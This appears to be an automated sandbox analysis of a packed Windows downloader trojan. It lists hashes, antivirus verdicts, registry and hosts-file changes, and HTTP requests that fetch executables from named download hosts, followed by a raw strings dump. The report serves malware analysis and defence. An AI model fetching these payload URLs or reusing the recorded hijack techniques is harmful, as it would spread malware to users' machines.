Analysis Date: 2014-10-14 02:16:55
MD5: e7779b4afbbec65b34adc6523684691a
SHA1: a95e78ead14f584fb2a5f714c4ddcb1e6034ac94

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section UPX0: md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0 (empty section; these are the hashes of zero-length input)
Section UPX1: md5: 4e7fe04c92eac67dd35ae50789e91789 sha1: 90f4fd1a5aec9aafc2c097403e12049599adbb6a size: 216576
Section UPX2: md5: e79cf2af70c05ab8da55615cd9a4e003 sha1: 4003a0be95a04b7d32cec546a11610d1180bf9b4 size: 1024
Timestamp: 2014-10-08 00:18:12
Packer: UPX -> www.upx.sourceforge.net
PEhash: f8d69f6537a890c5e7971b79f6a8097cb63fb7ef
IMPhash: 12949835d0cda9d5836fa2fbd6c55e3c (computed on the packed file; with UPX the import table is the packer stub's, so this value characterizes the packer rather than the payload)
AV 360 Safe: Gen:Variant.Symmi.42740
AV Ad-Aware: Gen:Variant.Symmi.42740
AV Alwil (avast): no_virus
AV Arcabit (arcavir): no_virus
AV Authentium: no_virus
AV Avira (antivir): no_virus
AV BullGuard: Gen:Variant.Symmi.42740
AV CA (E-Trust Ino): Win32/Oflwr.A!crypt
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV Emsisoft: Gen:Variant.Symmi.42740
AV Eset (nod32): Win32/Agent.WCF
AV Fortinet: no_virus
AV Frisk (f-prot): no_virus
AV F-Secure: Gen:Variant.Symmi.42740
AV Grisoft (avg): no_virus
AV Ikarus: no_virus
AV K7: no_virus
AV Kaspersky: Trojan-Downloader.Win32.Generic:Trojan.Win32.Hosts2.gen
AV MalwareBytes: no_virus
AV Mcafee: no_virus
AV Microsoft Security Essentials: no_virus
AV MicroWorld (escan): Gen:Variant.Symmi.42740
AV Norman: win32:win32/SB/Malware
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: no_virus
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): no_virus
AV Yara APT: no_virus
AV Zillya!: no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.2345.com/?k98792151\\x00
Registry: HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage ➝
NULL
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue ➝
NULL
Creates File: C:\Program Files\Common Files\appers_7_1958.exe
Creates File: C:\WINDOWS\system32\drivers\etc\hosts
Creates File: C:\Program Files\Common Files\asdqw_3104-48740.JPG
Creates File: C:\WINDOWS\system32\unrar.dll
Winsock URL: http://cdn.pcbeta.attachment.inimc.com/data/attachment/forum/201409/12/173937imav9yvcycn3akua.jpg
Winsock URL: http://down.9vh.net/appers_7_1958.exe
Winsock URL: http://down.tianyunxj.com/tqrl_97_1957.exe

Network Details:

DNS: webmirror.pcbeta.com
Type: A
113.107.42.25
DNS: down.9vh.net
Type: A
222.186.60.3
DNS: c06.i06.arnic.hadns.net
Type: A
116.11.254.249
DNS: c06.i06.arnic.hadns.net
Type: A
183.57.148.246
DNS: cdn.pcbeta.attachment.inimc.com
Type: A
DNS: down.tianyunxj.com
Type: A
HTTP GET: http://cdn.pcbeta.attachment.inimc.com/data/attachment/forum/201409/12/173937imav9yvcycn3akua.jpg
User-Agent: (none)
HTTP GET: http://down.9vh.net/appers_7_1958.exe
User-Agent: (none)
HTTP GET: http://down.tianyunxj.com/tqrl_97_1957.exe
User-Agent: (none)
Flows TCP: 192.168.1.1:1031 ➝ 113.107.42.25:80
Flows TCP: 192.168.1.1:1032 ➝ 222.186.60.3:80
Flows TCP: 192.168.1.1:1033 ➝ 116.11.254.249:80

Raw Pcap
0x00000000 (00000)   47455420 2f646174 612f6174 74616368   GET /data/attach
0x00000010 (00016)   6d656e74 2f666f72 756d2f32 30313430   ment/forum/20140
0x00000020 (00032)   392f3132 2f313733 39333769 6d617639   9/12/173937imav9
0x00000030 (00048)   79766379 636e3361 6b75612e 6a706720   yvcycn3akua.jpg 
0x00000040 (00064)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000050 (00080)   63646e2e 70636265 74612e61 74746163   cdn.pcbeta.attac
0x00000060 (00096)   686d656e 742e696e 696d632e 636f6d0d   hment.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f617070 6572735f 375f3139   GET /appers_7_19
0x00000010 (00016)   35382e65 78652048 5454502f 312e310d   58.exe HTTP/1.1.
0x00000020 (00032)   0a486f73 743a2064 6f776e2e 3976682e   .Host: down.9vh.
0x00000030 (00048)   6e65740d 0a436163 68652d43 6f6e7472   net..Cache-Contr
0x00000040 (00064)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000050 (00080)   63646e2e 70636265 74612e61 74746163   cdn.pcbeta.attac
0x00000060 (00096)   686d656e 742e696e 696d632e 636f6d0d   hment.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f747172 6c5f3937 5f313935   GET /tqrl_97_195
0x00000010 (00016)   372e6578 65204854 54502f31 2e310d0a   7.exe HTTP/1.1..
0x00000020 (00032)   486f7374 3a20646f 776e2e74 69616e79   Host: down.tiany
0x00000030 (00048)   756e786a 2e636f6d 0d0a4361 6368652d   unxj.com..Cache-
0x00000040 (00064)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000050 (00080)   650d0a0d 0a636265 74612e61 74746163   e....cbeta.attac
0x00000060 (00096)   686d656e 742e696e 696d632e 636f6d0d   hment.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....


Strings
y
.
9.
m4
.V
.00
Ln
...
..v.
$.
.,.V.9
.K
;
g
.
.
{.}'.
.
..
%U
.A
b
.
.^
>
.
u
y
.
9.
m4
.V
.00
Ln
...
..v.
$.
.,.V.9
.K
;
g
.
.
{.}'.
.
..
%U
.A
b
.
.^
>
.
u
<!/'#_
>	>">.
 !"#$%&'()*+,-
{,<< ;
0 0&0,02
010:0G0S0g0m0
03V4T7~
=0>55Zk
&%070K0_R
@0808C
 (08@P`p
**.0b2
	 0@eh
0^K:.<
0W5$v!
;1;?;{;
1 1$1(1,
1%1B1U1^1
>1.76H
1c8g8k8o8s8w8{8
|1et7f
<*>1>j>q
(1p^xN?
1q2	2C2
1#QNAN
1r1v1z1~1
:1|.r&c
1RP-t,&
 1xmlns="
2| @ ~
219.235
2(252;2O2
227562
2"2+r	
24_mt1CYf3
?"?&?*?.?2?6?:
2>JZfx<
-3|00T
3<048<
31o0a2`
32@3L3X
32\taskmgr.exe
3$3(3H
:'.35@.
35138b9a-5d9fbd-8
:(>->3>8>Y>[
3c5W7J
3LTP8o
3#]LwD
'3tb_~23!
=3&ufD
"	3Y\.
<4\4`4d
4463<tU `
456789abcdef
46-4 -a5
465p5X7
4,84(D!
48crSLF
48`}<j
4;BA@845ZL
4,d*C_
4\<`<d<h
4~f9.u
>4LEJh
4R:|0mI/
4s+^,(8	7
4wB6!H
)4{;Zr
50o0y0
517xky.we
538f494a2afdb0c
"57-15
5eqYCr
5\Ga=0
.5{ika
5OqNC4
5S"m[E9
/5t"bu
5tJ&RG
	5YfF-.|p
\\(6@"
<602..g-
60[awbw
6@@+3;
647X7`
6!6(6/6N6U6\6c6
6,686<
6"7-7Q6
6.cB:)
6J?	fQH+
6k>o>s
 6Lbx<
6NDh&%X
<6N@nG
6Q617]7
6r$,&80
6TJC%}
6v@%'h
6	*y9t
<6Z2ea7be1o
!6z")n
7$:(:,
73937Zav9yvcycn3aku
77>7E7L
7"818;9X9
7=f;*Y.
7J-%$J
7K8\8j8
7UQPXY]_
7V;,0,27Bsl
8002*<>|"
8273I3
83`$	Q
@<840(>
84l2c4511da95:8642Q
8]6SV&
8"8(8.84
>88@jP{
8`@8Vf
]8.9|9
8"C4BEh
<8C8J8Q8X8_8f8
\.8<@D.
(8l@03
8NA,E!
\?8=O~
8`t4=Ft
#8UP*$JBOWXQlEO
^8uWu5s%
8VWa~X
`8Z8d8
900FB7
92.e:$:
942q71fFy
959@9y9
^}%95PIb~
9,~89B
98:T:\:d:u:
9(fdvlt
)9Fxh8$
9GH&	,
9`:i:r:~:
9J:n:t:z:
)9StpA
,$\9?x
?~]9x9
_9~X~B
9Y:2D5
9y`8;qdt
A0/?k9879215
$a'']+4
*A7_[pG>
AA2L"k.
.//:;<=>?@ABCDE
@ACL@TM
*ad(NX
ADVAPI32.dll
ad	wVJ
aEPK*h
<afnwQ
~_AFX_
aLrr}C
A<\m u
and Object
AN~-t/
(apX3w
aqtn,CO 
ATL.DLL
.?AVqm
!A'WCl
a!xijklm
*AxW`X
A[Y+=4
}Ay@K#
}b1Free3pv5l
>B>_2.
B6T}B.S
B7|CfT\
::bad_
BASES-Q
bB=A}\
}BbP*l
bbsWjajF<
**BCCx
{Bc*m>r[sK6ly
%`@bCryptKeyCacheI
>BEFGJQ<(=~
?B?F?J?N?R?V?Z?^?b?f?j?n?r?v?z
Bg}B9(
BitBlt
BJ m.G
:B>n9<f
|#b(}O
bR@<@u
^Bs4vE
b{%t[3Y
BT=	q]\
Buff#Uppw
@B.vTE(
BWideC
B	wR`Z
%<BZ$=Yv
CAfxOldhProc423'
cAn!EH
@&C)B:txCF
ccOe@.
	`,Cdt
<char>
clB127.0
ClosePrinter
 (/clr)M
CmdTar*t
COMCTL32.dll
CONOUc
CoUV[i
c^P	'~
c)?pOT
cp@pWh 
CPPZbugHook
Cqi7gq
cripth.
ctorgk
curityP
CWinApp
D0J0P0V0\B
*d 0N@
^.D2qs
D3xB#a-
]D;79j
D7m7y7
D9_Pt?&
DBu.hX3
dc71cb6o
Dc?THREAD
d D\%'"
DD~!g8-U
? DefaultI0nE
~d\Fold
.D<G:FP
\\`dh\.
>>+DHr
&D~j2H
_D!LX4
DnE"yP0
	?^dO"
:D}O`,[
dqw_3104-4
DragFinish
:dtZ6(
DWORD4
dXL6"y
dXP^D@<y
)dxu2ZB
E4SCQD
E7IV3<AQ
E<$'-A
EAP_SEL
]..EbuB'
{E^cHi
Edit Tex
))EE	F
%|E?f;
;`eh %
e@-K=6
E<`l9A[
Elehmd
~em$qqri
e#nrO-uI
EnumDisplay/Lk
@eQQPC
Es<p4!
E|SYo|C
euoGetM i
ExitProcess
F0RYx.s
f1D?y_
F|.4E*
f>?77=
f`7>fal
f7j7w7
@FBC(|5
@.f@C|
F-fR_u|
FGEsS8T
FGPYYa
?'fg?t
F]ht_Y
@Fh@:w
FKl\3H
f,l\ )
F:^,LI
FO{FD@
/Format
f,:pvp
;fr?=Q2
	'<FSAU
fstVkvAw
-Fvl#PL-(;=4t
' f*x.
FY	1E`
fY#i(I
fzhWfv
!g(~=7
,G94952`]ST
GcOxOnpF8
GDI32.dll
GetProcAddress
gH i$ 
g:HTTP+
g]lBMg
_GLOBAL_Hw
'G@N`]w
-?gWWWJ
<G;||y
	?-G{,Y
h595b64144ccf1dfBl
~H5h5t5
>(@H$6
h6l Dlg
h7xfui
#h~%am
>h`b?ku
$Hbmzd
HDA&{C
hDJ&aM
HgOHZu"
H]@H.6
/h%HDko
HiC{.mijr
H"J;${6S1
HKEY_LOC
h%kmjh{
"(>H>L>l>p>
	hl-sms=
ho&B&V
h.`rkE
?(?H?T?X?h?
Hu)19j
I*@!0Af,l
i4h88V
i6xCL*.DLL
%I7uj=cP
ibly.ie
I &(C3
IF.G,,,
i&FH/^
i_H<VE
IJKLMNO
>_I:l 
ileNameW
INSZdl<
InternetOpenA
i~<r_J
 @ise,
IS_I5Qt0S
IT8#gu
).iU2A
ivOMA$#R6028
{Iw:=0
IXxdaE
J.5P*vZP
?J;7uT
japoO|
JcG 6lQ
J,{]&d
jEEE) *
jf,;;A
_jg04Ou\F483lZatm6IP
;j`h8N
j\HZ,$%
jKOhE"
jmx#i-
^J@][N	
jO57OOou
=JO%`G.
jPzJt]`
jS>Vs~
'juHaYd*
ju!QcX
jV%X^2
 JyO$|
-<=<J<z<
*jZ2Gi
($K( &
K C2P_O
k,CbW4U
kCH}b^)9
]K%E"+
;\@KERN8
KERNEL32.DLL
kH;er 8^D
KhG-Ac[u
KO78h2P
;k=o=s=w
;kp7qO|E"
 k?PuFF
kQE?@-j
k Source D
kWwktZ
`'L"` 
l4\P=s.
?,(-laa
l{A(+i
LASSES_ROOT
 L?A#YP<
LBnew_9p[
"#ld*fN
/LfarV
\lh/8x
lhd`\X<
`(`;l&I
lj0@P]v
LJJ!M&
l^_lcl
LoadLibraryA
> l#v$
L\vJb\0
lX|A/nN]
,<L<X<x<
l.yi85
}%M `]
>m0`qj1`
M0s041<1
M,3g\%=
"M3X_z7
m4}5 DS
mA8~+@
MACHjE\SOFTWAR
"$max,U
mbA91kd0
MEfd{g
?-mEpg8l7
mGH4_Tex
..mi7D
MiscSt
,m lu 
=MODULE_
&m|rl_DZgL
Msug@wu
m!%ts+
 m.v1"z
]N,a6^
\nbwnX
n,C4Q4a4p4
NcS9X])d
{n'Frre3V
NH-6>Y
/NH9NvZz9f9l9|
nKh0(X~N
NNCPgR/S
,.NNnk
(n}ob#
No such.
NotSupp
Np*H{o
>N$R8Nd??
nsoftw
]nt>j,
n _vec=v
~O4n4v4
o#Bv%2
od1.0">
OdN52^
oegU"H
oJ\h$K
ole32.dll
OLEAUT32.dll
oledlg.dll
OLEPRO
OleRun
OlgI`:s1x
O.mpGpM 
omPoizo'7b
`oNG_NO&
Oo!+Bt
oOlt!c573r
opyright 
!orRYD
Ou5h=;
oUC++ RALi
OU]Sh,_H
o"u>Vj
{P!,2X
p{4L2U
P[5A#d`
P6 wGd`
P7Xpu1*
p9	o`Q-
p <'a(
"#p[;'A"
PADVAPIx
P`AmRhbBA
PathMatchSpecA
PBL"Po7
[Pb$RP3
|pdXL<
~p,gow
piW0gSs
`/@PJ.
pkcWMG
pK\w1SXX-A
*< Pl\
Poa3Eh!
>PPADD
p*p@guo5
p(Q(Sw
\!	&Pr
PRiItm
`PU@|0,
Pu&gnQ	%
+p@u	T
Pv`Q`5Y
P'XA!P;
pZp~d2t
QAuto=1
QD49Yw
qFbAlX
!QFWa:d
QGD"1BS
*QjV*C0
Q>KtL>@
\@QlR %
qoAMSKJW
qp:hHAH
qptfV?_
`qsd.k
  qui*
qu*Th{
Qu,UPi;
Q --wj-la
r$(,04r
 R_0X.
r5_vl..1
R7%w.J#
{r8<>.=	
RA1Ffg1w1
r\Advb
*Rais#z
rdi2b.c: 
RegFlushKey
r&Et`%g
rfL2g[C
? @(RG
R_h O*
rI/OB}
rkE@$@
rkv_{l&
R@l/+3(
RM8ui@
r%'MDIFr
rnetlt
Rp/Ws&BC!x
RPyHSy
:'RQ]k
/ rr!'
rri000K3D
r"^(r Z
rs\etc\ho(s)
rXt;:m
RyUh:PGtk&
RzDoD4t
S3Y3d3p3
S:4oBj'
S=8p]K[Gl)
Saf1Dhk
S )Augus
SB`>H^
:sch&0-m=
S@Dt9f
s	 E]ov
sE[YD%
s_g@;	"
sGiQIYI\QiyiI,
S_g	S2L
sgwdnI13
shadu007
SHELL32.dll
shlw47D
SHLWAPI.dll
si!9, %8^
SIMULATE_TLS: 
SIV,,>
#&}sjxun9
skQ_7_1958
;Sl\C$
sO;>|C;
SPkLYIu
<[SQf9
	}s)t&
stK?OMN
SV1)ik01
S-X< f?
}+*`SXU
$s/z \
s_ZDWQ
T2X2h2x2
t44 ,;
t4&.A8
@]%T4}X
T6zVhDJP
t8-WWwSH
"t^9(uZ
TBQkEx
$])TD`
T^&d%er
"'tDM5.
.te_oB
tfk('T
!This program cannot be run in DOS mode.
Th$s'7
Th spa
tiH' V&
#Tj _f
*,*T(K
~T$*L$
(tmc'$VP9
TofRr#32
<TPLHD
t(?pyA
|tqrl1M_9
}~t$R)
t*SWpx0X
T*,TL4N
ttp://
;T$X]}_
T#y/76
T)=ZU$
t=ZVP	
u0E0xKeh
uA ( HH
\??\!uc
udxvq&
Uf%F`=
ui$<5a
)uk0	O$
ungpl|n
unxj{U8
UOffHA
?Upbe%
$	 UPdR,l
$upValue
	"UQ.2i,9
?Us6Ex
USBC]#
USER32
USER32.dll
uU8uQs
uV~6hR+
uvwxyz
uwu@Sy28L
u)xf"0o
V/.2r{
v7^AsW
@v8iv!
]*VA,@
>v	A`dH
VC20XC00
vd6WJO!
_v=d}Lj
VE9&_0
VERROR
VF0:`?
V{H$OI
viewPages
VirtualAlloc
VirtualFree
VirtualProtect
 V+Iy`
Vj(@X<i
VL,/d&k
vObbfp
\\v]Po
V#[Q$S@
,&[vrH
VrH<<'
VSPLAY
>VUSWY
 VX4)W
@W0122r2*23
Wait@2
was about
(w@D,!@
WDOCU(
$\&wFC
w"F$WRv
wgFk?s
WH^%SM
WININET.dll
WINSPOOL.DRV
wIXIp+$
	WjEa)
W	j	XO
wLVSPm
|w"NV9
 w	o%S
.wphi8
~&WPwF
 w{r1}
WSNi2>
]w.T'H
)WTK0s(VS9
w/wu,v
Wx#6Bv
wY{58&(hVbv)
X`?{|}
X$\0t	
X8t;,o^
x&^bP\n
+Xb	+V
xCbFt+
)X/'D5
xGdX%t
xhSG8j
xiGtt4e
,XKtU?
Xk/'X`
 <Xm1[
x ^N._
X,@N_|A
XPTPSW
@xt&Box
Xt+DPI
x+u!xO0
~x |Wz
XYZ[\O
:Y0*+K
Y[4R[|
y840,(
.._Y?FA?	
`YFW }
.Y[[h]u_
yI}ciI/m'@6X
YK<=l;,
YM0]W#8	&
(yp8OXAn
yp-@_S
{<:y&q?	
YSTEM6
+&#@YtR;
YTXLHXV
Y`V8	+
Y_V_#Pa
 +Y.Xhz|m
;\YYyX
/< }z"
_z1YY4P.
z64lbt4xk&<4
 ;,ZIac
ZKTm#\
ZlGL@:S
zLyk`'
^][_Zm
Z[!(m~
ZmmitH
"?[ZQZPG
ZR9g9%
#[ZxJu
Zz@a]1(